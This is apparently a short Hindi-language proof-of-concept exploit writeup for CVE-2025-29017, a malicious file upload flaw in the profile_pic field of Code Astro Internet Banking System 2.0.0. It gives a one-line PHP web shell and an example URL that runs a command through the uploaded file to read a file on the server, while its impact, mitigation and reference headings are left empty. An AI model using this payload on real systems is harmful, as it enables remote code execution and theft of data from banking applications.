
प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट CVE-2025-29017 के लिए, जो Code Astro Internet Banking System 2.0.0 में दुर्भावनापूर्ण फ़ाइल अपलोड के माध्यम से रिमोट कोड निष्पादन प्रदर्शित करता है।
Code Astro Internet Banking System 2.0.0 में अनुचित फ़ाइल अपलोड सत्यापन के कारण रिमोट कोड निष्पादन (RCE) भेद्यता मौजूद है, जो pages_view_client.php के भीतर profile_pic पैरामीटर में है। हमलावर अपलोड अनुरोध को संशोधित करके सुरक्षा जाँचों को बायपास कर सकते हैं, जिससे मनमाना कोड निष्पादन होता है।
pages_view_client.php में profile_pic पैरामीटर


<?php system($_GET['cmd']); ?>


http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt

प्रभाव
शमन
संदर्भ